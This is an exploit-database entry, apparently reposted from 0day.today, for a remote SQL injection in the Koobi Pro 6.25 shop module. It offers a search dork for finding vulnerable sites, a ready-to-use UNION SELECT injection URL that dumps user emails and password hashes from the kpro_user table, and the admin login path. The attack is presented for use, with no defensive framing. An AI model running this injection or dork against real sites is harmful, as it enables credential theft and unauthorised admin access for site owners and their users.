id: 2853
date: 04/07/2008
title: Koobi Pro 6.25 shop Remote SQL Injection Vulnerability
author: S@BUN
cves: 

======================================================
Koobi Pro 6.25 shop Remote SQL Injection Vulnerability
======================================================



##########################################
#
# Koobi Pro 6.25 shop (categ)
#
all version Koobi
#
###########################################
#
# DORK 1 : allinurl: "index php p shop"categ
#
###########################################
EXPLOiT :

index.php?p=shop&show=showdetail&fid=S@BUN&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user

admin login=admin/login.php

###########################################



#  0day.today [2023-03-21]  #